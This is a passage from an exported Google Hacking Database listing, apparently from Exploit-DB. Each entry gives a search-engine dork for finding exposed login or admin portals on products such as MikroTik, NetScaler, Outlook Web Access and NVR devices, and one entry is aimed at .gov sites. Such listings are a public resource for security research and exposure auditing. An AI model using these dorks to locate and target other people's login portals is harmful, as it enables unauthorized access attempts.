<shortDescription>intitle:&quot;mikrotik routeros &gt; administration&quot; intext:&quot;mikrotik routeros&quot; intext:&quot;configuration page&quot; -demo intext:&quot;Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA&quot;</shortDescription>
<textualDescription>Description: MikroTik RouterOS configuration &amp; login page
Google search: intitle:&quot;mikrotik routeros &gt; administration&quot;
intext:&quot;mikrotik routeros&quot; intext:&quot;configuration page&quot; -demo
intext:&quot;Mikrotik, RouterOS and the Mikrotik logo are registered
trademarks of Mikrotikls SIA&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;mikrotik routeros &gt; administration&quot; intext:&quot;mikrotik routeros&quot; intext:&quot;configuration page&quot; -demo intext:&quot;Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;mikrotik routeros &gt; administration&quot; intext:&quot;mikrotik routeros&quot; intext:&quot;configuration page&quot; -demo intext:&quot;Mikrotik, RouterOS and the Mikrotik logo are registered trademarks of Mikrotikls SIA&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>182</id>
<link>https://www.exploit-db.com/ghdb/182</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MikroTik RouterOS Managing Webpage&quot;</shortDescription>
<textualDescription>This is the front page entry point to a &quot;Mikro Tik&quot; Router.</textualDescription>
<query>intitle:&quot;MikroTik RouterOS Managing Webpage&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22MikroTik+RouterOS+Managing+Webpage%22+</querystring>
<edb></edb>
<date>2004-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7114</id>
<link>https://www.exploit-db.com/ghdb/7114</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Mitel Standard Linux: Login Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Mitel Standard Linux: Login Page&quot;
# Category: Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Mitel Standard Linux: Login Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Mitel Standard Linux: Login Page&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4283</id>
<link>https://www.exploit-db.com/ghdb/4283</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MODX CMF Manager Login&quot;</shortDescription>
<textualDescription>Searches for MODX login portals, even if admin portal URL is not at usual
location of /manager/
Author: Charles Holtzkampf</textualDescription>
<query>intitle:&quot;MODX CMF Manager Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MODX CMF Manager Login&quot;</querystring>
<edb></edb>
<date>2016-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>7180</id>
<link>https://www.exploit-db.com/ghdb/7180</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MultiView&quot; &quot;MultiView Events&quot; &quot;MOBOTIX&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;MultiView&quot; &quot;MultiView Events&quot; &quot;MOBOTIX&quot;
# Various Online Devices.
# Date: 6/09/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;MultiView&quot; &quot;MultiView Events&quot; &quot;MOBOTIX&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MultiView&quot; &quot;MultiView Events&quot; &quot;MOBOTIX&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>772</id>
<link>https://www.exploit-db.com/ghdb/772</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MX Control Console&quot; &quot;If you can't remember&quot;</shortDescription>
<textualDescription>MX Logic’s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies.</textualDescription>
<query>intitle:&quot;MX Control Console&quot; &quot;If you can't remember&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22MX+Control+Console%22+%22If+you+can%27t+remember%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4865</id>
<link>https://www.exploit-db.com/ghdb/4865</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;MyWebSQL&quot; + &quot;User ID: Password:&quot;</shortDescription>
<textualDescription>intitle:&quot;MyWebSQL&quot; + &quot;User ID: Password:&quot;
MyWebSQL login pages
ManhNho
</textualDescription>
<query>intitle:&quot;MyWebSQL&quot; + &quot;User ID: Password:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;MyWebSQL&quot; + &quot;User ID: Password:&quot;</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8041</id>
<link>https://www.exploit-db.com/ghdb/8041</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NB1601 Web Manager&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NB1601 Web Manager&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: HackerFrenzy</textualDescription>
<query>intitle:&quot;NB1601 Web Manager&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NB1601 Web Manager&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>7146</id>
<link>https://www.exploit-db.com/ghdb/7146</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NetBiter&quot; intext:&quot;based on NetBiter&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NetBiter&quot; intext:&quot;based on NetBiter&quot; -.com
# Pages Containing Login Portals
# Date: 31/08/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;NetBiter&quot; intext:&quot;based on NetBiter&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetBiter&quot; intext:&quot;based on NetBiter&quot; -.com</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>8042</id>
<link>https://www.exploit-db.com/ghdb/8042</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Netgate pfSense Plus - Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Netgate pfSense Plus - Login&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: HackerFrenzy</textualDescription>
<query>intitle:&quot;Netgate pfSense Plus - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Netgate pfSense Plus - Login&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>6473</id>
<link>https://www.exploit-db.com/ghdb/6473</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NETGEAR&quot; inurl:&quot;/base/main_login.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NETGEAR&quot; inurl:&quot;/base/main_login.html&quot;
# NETGEAR router login portals.
# Date: 11/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;NETGEAR&quot; inurl:&quot;/base/main_login.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NETGEAR&quot; inurl:&quot;/base/main_login.html&quot;</querystring>
<edb></edb>
<date>2020-08-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4830</id>
<link>https://www.exploit-db.com/ghdb/4830</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Netgear™ - NETGEAR Configuration Manager Login&quot;</shortDescription>
<textualDescription>intitle:&quot;Netgear™ - NETGEAR Configuration Manager Login&quot;
Login page.
ManhNho
</textualDescription>
<query>intitle:&quot;Netgear™ - NETGEAR Configuration Manager Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Netgear™ - NETGEAR Configuration Manager Login&quot;</querystring>
<edb></edb>
<date>2018-05-21</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6898</id>
<link>https://www.exploit-db.com/ghdb/6898</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NetScaler AAA&quot; inurl:logon/LogonPoint/tmindex.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NetScaler AAA&quot; inurl:logon/LogonPoint/tmindex.html
# Pages containing login portals.
# Date: 29/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;NetScaler AAA&quot; inurl:logon/LogonPoint/tmindex.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NetScaler AAA&quot; inurl:logon/LogonPoint/tmindex.html</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5252</id>
<link>https://www.exploit-db.com/ghdb/5252</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;netscaler gateway&quot; intext:password &quot;please log on&quot;</shortDescription>
<textualDescription>Netscaler web app log in portals.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intitle:&quot;netscaler gateway&quot; intext:password &quot;please log on&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;netscaler gateway&quot; intext:password &quot;please log on&quot;</querystring>
<edb></edb>
<date>2019-06-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1185</id>
<link>https://www.exploit-db.com/ghdb/1185</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Novell Web Services&quot; &quot;GroupWise&quot; -inurl:&quot;doc/11924&quot; -.mil -.edu -.gov -filetype:pdf</shortDescription>
<textualDescription>Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability.</textualDescription>
<query>intitle:&quot;Novell Web Services&quot; &quot;GroupWise&quot; -inurl:&quot;doc/11924&quot; -.mil -.edu -.gov -filetype:pdf</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Novell+Web+Services%22+%22GroupWise%22+-inurl%3A%22doc%2F11924%22+-.mil+-.edu+-.gov+-filetype%3Apdf&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>779</id>
<link>https://www.exploit-db.com/ghdb/779</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Novell Web Services&quot; intext:&quot;Select a service and a language.&quot;</shortDescription>
<textualDescription>&quot;NovellÂî GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWareÂî, Linux, Windows, or any combination of these operating systems.&quot;</textualDescription>
<query>intitle:&quot;Novell Web Services&quot; intext:&quot;Select a service and a language.&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Novell+Web+Services%22+intext%3A%22Select+a+service+and+a+language.%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7021</id>
<link>https://www.exploit-db.com/ghdb/7021</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Nutanix Web Console&quot;</shortDescription>
<textualDescription># Exploit Title: Pages Containing Login Portals
# Google Dork: intitle:&quot;Nutanix Web Console&quot;
# Date: 2021-06-28
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:&quot;Nutanix Web Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Nutanix Web Console&quot;</querystring>
<edb></edb>
<date>2021-07-20</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>6840</id>
<link>https://www.exploit-db.com/ghdb/6840</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NUUO Network Video Recorder Login&quot; &quot;Language&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NUUO Network Video Recorder Login&quot; &quot;Language&quot;
# NUUO Network Video Recorder Login pages.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;NUUO Network Video Recorder Login&quot; &quot;Language&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NUUO Network Video Recorder Login&quot; &quot;Language&quot;</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6490</id>
<link>https://www.exploit-db.com/ghdb/6490</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;NVR LOGIN&quot; -inurl:&quot;nvr | com | www | net&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;NVR LOGIN&quot; -inurl:&quot;nvr | com | www | net&quot;
Description: This google dork is useful for detecting all the login portals
of NVR based devices.
Author: Sibi Mathew George
</textualDescription>
<query>intitle:&quot;NVR LOGIN&quot; -inurl:&quot;nvr | com | www | net&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NVR LOGIN&quot; -inurl:&quot;nvr | com | www | net&quot;</querystring>
<edb></edb>
<date>2020-08-21</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>4989</id>
<link>https://www.exploit-db.com/ghdb/4989</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OAuth Server Login&quot;</shortDescription>
<textualDescription>intitle:&quot;OAuth Server Login&quot;
Login page
ManhNho
</textualDescription>
<query>intitle:&quot;OAuth Server Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OAuth Server Login&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>ManhNho</author>
</entry>
<entry>
<id>533</id>
<link>https://www.exploit-db.com/ghdb/533</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;oMail-admin Administration - Login&quot; -inurl:omnis.ch</shortDescription>
<textualDescription>oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support.</textualDescription>
<query>intitle:&quot;oMail-admin Administration - Login&quot; -inurl:omnis.ch</query>
<querystring>https://www.google.com/search?q=intitle%3A%22oMail-admin+Administration+-+Login%22++-inurl%3Aomnis.ch</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4250</id>
<link>https://www.exploit-db.com/ghdb/4250</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OneAccess WCF&quot; Username</shortDescription>
<textualDescription>Login screen for the OneAccess routers.
Author: Manuel Mancera (@sinkmanu)
</textualDescription>
<query>intitle:&quot;OneAccess WCF&quot; Username</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OneAccess WCF&quot; Username</querystring>
<edb></edb>
<date>2016-04-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>8264</id>
<link>https://www.exploit-db.com/ghdb/8264</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;online portal login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;online portal login&quot;
# Pages Containing Login Portals
# Date:19/10/2023
# Exploit Author: Safein Sadad
</textualDescription>
<query>intitle:&quot;online portal login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;online portal login&quot;</querystring>
<edb></edb>
<date>2023-10-19</date>
<author>Safein Sadad</author>
</entry>
<entry>
<id>1181</id>
<link>https://www.exploit-db.com/ghdb/1181</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OnLine Recruitment Program - Login&quot; -johnny.ihackstuff</shortDescription>
<textualDescription>This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity.</textualDescription>
<query>intitle:&quot;OnLine Recruitment Program - Login&quot; -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle%3A%22OnLine+Recruitment+Program+-+Login%22+-johnny.ihackstuff</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6967</id>
<link>https://www.exploit-db.com/ghdb/6967</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ONU&quot; intext:&quot;Please login to continue...&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;ONU&quot; intext:&quot;Please login to continue...&quot;</textualDescription>
<query>intitle:&quot;ONU&quot; intext:&quot;Please login to continue...&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ONU&quot; intext:&quot;Please login to continue...&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4797</id>
<link>https://www.exploit-db.com/ghdb/4797</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Open Source HRMS&quot; intext:&quot;powered by&quot;</shortDescription>
<textualDescription>This dork will show Human Resource Management System Login Page
intitle:&quot;Open Source HRMS&quot; intext:&quot;powered by&quot;
Avles Nas
</textualDescription>
<query>intitle:&quot;Open Source HRMS&quot; intext:&quot;powered by&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Open Source HRMS&quot; intext:&quot;powered by&quot;</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Avles Nas</author>
</entry>
<entry>
<id>4236</id>
<link>https://www.exploit-db.com/ghdb/4236</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Openbravo&quot; (inurl:&quot;openbravo/security/Login_FS.html&quot; | inurl:&quot;openbravo/security/Login_Welcome.html&quot; | inurl:&quot;openbravo/security/Login_F1.html&quot; | inurl:&quot;openbravo/security/Login_F0.html&quot;)</shortDescription>
<textualDescription>Description: Openbravo login page
Google search: intitle:&quot;Openbravo&quot;
(inurl:&quot;openbravo/security/Login_FS.html&quot; |
inurl:&quot;openbravo/security/Login_Welcome.html&quot; |
inurl:&quot;openbravo/security/Login_F1.html&quot; |
inurl:&quot;openbravo/security/Login_F0.html&quot;)
Author: nebo_oben</textualDescription>
<query>intitle:&quot;Openbravo&quot; (inurl:&quot;openbravo/security/Login_FS.html&quot; | inurl:&quot;openbravo/security/Login_Welcome.html&quot; | inurl:&quot;openbravo/security/Login_F1.html&quot; | inurl:&quot;openbravo/security/Login_F0.html&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Openbravo&quot; (inurl:&quot;openbravo/security/Login_FS.html&quot; | inurl:&quot;openbravo/security/Login_Welcome.html&quot; | inurl:&quot;openbravo/security/Login_F1.html&quot; | inurl:&quot;openbravo/security/Login_F0.html&quot;)</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6011</id>
<link>https://www.exploit-db.com/ghdb/6011</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OpenMeetings&quot; intext:&quot;Username or mail address&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;OpenMeetings&quot; intext:&quot;Username or mail address&quot;
Info: Apache OpenMeetings login portals
Author: M. Cory Billington (@_th3y)
</textualDescription>
<query>intitle:&quot;OpenMeetings&quot; intext:&quot;Username or mail address&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OpenMeetings&quot; intext:&quot;Username or mail address&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>6471</id>
<link>https://www.exploit-db.com/ghdb/6471</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OpenWrt - LuCI&quot; &quot;Authorization Required&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;OpenWrt - LuCI&quot; &quot;Authorization Required&quot;
# Pages containing login portals.
# Date: 06/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;OpenWrt - LuCI&quot; &quot;Authorization Required&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OpenWrt - LuCI&quot; &quot;Authorization Required&quot;</querystring>
<edb></edb>
<date>2020-08-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6942</id>
<link>https://www.exploit-db.com/ghdb/6942</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;OpenWrt - LuCI&quot; intext:&quot;Powered by LuCI | OpenWrt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;OpenWrt - LuCI&quot; intext:&quot;Powered by LuCI | OpenWrt&quot;
# Pages Containing Login Portals
# Date: 22/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;OpenWrt - LuCI&quot; intext:&quot;Powered by LuCI | OpenWrt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OpenWrt - LuCI&quot; intext:&quot;Powered by LuCI | OpenWrt&quot;</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7978</id>
<link>https://www.exploit-db.com/ghdb/7978</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Oracle Access Management&quot; &quot;login&quot; -inurl:oracle</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Oracle Access Management&quot; &quot;login&quot; -inurl:oracle
# Category: Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Oracle Access Management&quot; &quot;login&quot; -inurl:oracle</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Oracle Access Management&quot; &quot;login&quot; -inurl:oracle</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5214</id>
<link>https://www.exploit-db.com/ghdb/5214</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;oracle bi publisher enterprise login&quot;</shortDescription>
<textualDescription>Google dork description: Sites running Oracle Business Intelligence
Google Search: intitle:&quot;oracle bi publisher enterprise login&quot;
Submitted by: Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>intitle:&quot;oracle bi publisher enterprise login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;oracle bi publisher enterprise login&quot;</querystring>
<edb></edb>
<date>2019-05-14</date>
<author>Alfie</author>
</entry>
<entry>
<id>6796</id>
<link>https://www.exploit-db.com/ghdb/6796</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;oracle business intelligence sign in&quot;</shortDescription>
<textualDescription>Google dork description: Oracle Business Intelligence Sign in page
Google Search: inurl:&quot;intitle:&quot;oracle business intelligence sign in&quot;&quot;
Submitted by: Alfie
--
Regards,
Alfie.
</textualDescription>
<query>intitle:&quot;oracle business intelligence sign in&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;oracle business intelligence sign in&quot;</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>Alfie</author>
</entry>
<entry>
<id>7227</id>
<link>https://www.exploit-db.com/ghdb/7227</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;oracle login&quot; site:.gov</shortDescription>
<textualDescription># Google Dork: intitle:&quot;oracle login&quot; site:.gov
# Pages Containing Login Portals
# Date: 14/09/2021
# Exploit Author: Saiju Pillai</textualDescription>
<query>intitle:&quot;oracle login&quot; site:.gov</query>
<querystring>https://www.google.com/search?q=intitle:&quot;oracle login&quot; site:.gov</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>5239</id>
<link>https://www.exploit-db.com/ghdb/5239</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Outlook Web Access&quot; | &quot;Outlook Web app&quot; -office.com -youtube.com -microsoft.com</shortDescription>
<textualDescription>Outlook Web Access (OWA) login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>intitle:&quot;Outlook Web Access&quot; | &quot;Outlook Web app&quot; -office.com -youtube.com -microsoft.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Outlook Web Access&quot; | &quot;Outlook Web app&quot; -office.com -youtube.com -microsoft.com</querystring>
<edb></edb>
<date>2019-06-03</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5784</id>
<link>https://www.exploit-db.com/ghdb/5784</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Outlook Web App&quot; inurl:&quot;/owa/auth&quot; logon ext:aspx</shortDescription>
<textualDescription>--
*Regards,*
*Ubaid Ahmed*
*https://UbaidAhmed.com *
</textualDescription>
<query>intitle:&quot;Outlook Web App&quot; inurl:&quot;/owa/auth&quot; logon ext:aspx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Outlook Web App&quot; inurl:&quot;/owa/auth&quot; logon ext:aspx</querystring>
<edb></edb>
<date>2020-03-11</date>
<author>Ubaid Ahmed</author>
</entry>
<entry>
<id>7101</id>
<link>https://www.exploit-db.com/ghdb/7101</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ovislink&quot; inurl:login intext:&quot;My Resource&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ovislink&quot; inurl:login intext:&quot;My Resource&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;ovislink&quot; inurl:login intext:&quot;My Resource&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ovislink&quot; inurl:login intext:&quot;My Resource&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5609</id>
<link>https://www.exploit-db.com/ghdb/5609</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Pandora FMS mobile&quot;</shortDescription>
<textualDescription># Dork #
intitle:&quot;Pandora FMS mobile&quot;
Login Portals.
</textualDescription>
<query>intitle:&quot;Pandora FMS mobile&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pandora FMS mobile&quot;</querystring>
<edb></edb>
<date>2019-10-30</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>4634</id>
<link>https://www.exploit-db.com/ghdb/4634</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Panel Administracyjny&quot;</shortDescription>
<textualDescription>*Google Dork : intitle:&quot;Panel Administracyjny&quot;*
*Description : Show admin panel of .pl (Poland) websites. *
*Author: P5N4PPZ*
</textualDescription>
<query>intitle:&quot;Panel Administracyjny&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Panel Administracyjny&quot;</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>P5N4PPZ</author>
</entry>
<entry>
<id>8209</id>
<link>https://www.exploit-db.com/ghdb/8209</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;PaperCut login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;PaperCut login&quot;
# Pages Containing Login Portals
# Date:02/06/2023
# Exploit Author: SatishKumar Pyata</textualDescription>
<query>intitle:&quot;PaperCut login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;PaperCut login&quot;</querystring>
<edb></edb>
<date>2023-06-02</date>
<author>SatishKumar Pyata</author>
</entry>
<entry>
<id>8043</id>
<link>https://www.exploit-db.com/ghdb/8043</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Parallels User Portal&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Parallels User Portal&quot;
# Pages Containing Login Portals
# Date:31/01/2023
# Exploit Author: HackerFrenzy</textualDescription>
<query>intitle:&quot;Parallels User Portal&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Parallels User Portal&quot;</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>4728</id>
<link>https://www.exploit-db.com/ghdb/4728</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;partners login&quot;</shortDescription>
<textualDescription>Login portals
Bruno Schmid
</textualDescription>
<query>intitle:&quot;partners login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;partners login&quot;</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6885</id>
<link>https://www.exploit-db.com/ghdb/6885</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Payvand PACS&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Payvand PACS&quot;
# Pages Containing Login Portals(EMR Systems)
# Date: 15/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Payvand PACS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Payvand PACS&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7112</id>
<link>https://www.exploit-db.com/ghdb/7112</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;PBX Login&quot; -inurl:pbx|pbxlogin -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;PBX Login&quot; -inurl:pbx|pbxlogin -.com
# Category: Pages Containing Login Portals
# Date: 31/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;PBX Login&quot; -inurl:pbx|pbxlogin -.com</query>
